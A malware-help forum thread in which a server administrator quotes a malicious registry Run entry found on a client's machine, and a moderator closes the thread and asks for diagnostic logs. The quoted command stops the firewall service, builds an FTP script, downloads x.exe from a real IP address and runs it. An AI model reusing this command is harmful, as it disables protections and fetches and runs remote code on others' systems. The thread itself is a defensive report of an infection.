Spyware Warrior

[paulrw]

logging on to a clients server today I noticed a command window appear briefly. Hunting it down I found this in the registry (HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run)

c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 210.76.97.212> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get x.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&x.exe&x.exe&del cmd.txt /q /f&exi

which looks to me to be creating a command file to download and run a program, deleting itself after running. This is not found by antivirus/malware programs I have run. Anyone know of it, and anything else it may have left about the place?
I don't know if this is the correct place to post this, but it seems that if you don't know of it, maybe you should! the FTP site resolves to an address in China. I have deleted the registry key. I have also found some spurious users on the system with admin rights, so I presume this program is creating a backdoor to the system
_________________
Paul Wilkie

[Cypher]

By posting just a description of your problems it is likely that your post will be passed by and you will not receive the help you're looking for.

We need to know what's running on your computer so that we can give you appropriate instructions, and this information is provided by DDS logs.

This thread will now be closed.

If you still need help, please start a new thread with:-

• DDS logs.
  
• Details of the problems you're experiencing.
  
• Any messages or error codes you may have got.
  

If for any reason you can't run DDS, please let us know in your post.

Details for running a DDS scan can be found ........... HERE
_________________
Admin/Teacher at Malware Removal University
Member of...